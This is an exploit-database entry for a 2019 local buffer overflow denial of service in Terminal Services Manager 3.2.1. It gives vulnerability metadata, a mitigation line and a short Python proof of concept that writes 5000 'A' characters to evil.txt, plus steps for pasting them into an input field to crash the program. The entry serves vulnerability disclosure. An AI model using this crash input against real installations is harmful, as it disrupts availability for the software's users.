Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service

vendor:

Terminal Services Manager

by:

Alejandra Sánchez

7.8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Terminal Services Manager

Affected Version From: 3.2.1

Affected Version To: 3.2.1

Patch Exists: YES

Related CWE: N/A

CPE: //a:lizardsystems:terminal_services_manager:3.2.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Terminal Services Manager 3.2.1 – Local Buffer Overflow Denial of Service

Terminal Services Manager 3.2.1 is vulnerable to a local buffer overflow denial of service attack. By creating a malicious file containing a large number of 'A' characters and pasting the contents of the file into the 'Computer name or IP address' field, an attacker can cause a denial of service condition.

Mitigation:

Ensure that Terminal Services Manager is updated to the latest version and that all users are aware of the potential risks of buffer overflow attacks.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service
# Date: 22/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://lizardsystems.com
# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe
# Version: 3.2.1 (Build 247)
# Tested on: Windows 10

# Steps to produce the crash:
# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt'
# 2.- Open Terminal Services Manager
# 3.- Click 'Add computer'
# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK'
# 5.- In the 'List' tab select the computer created.
# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash! 

buffer = "\x41" * 5000

f = open ("evil.txt", "w")
f.write(buffer)
f.close()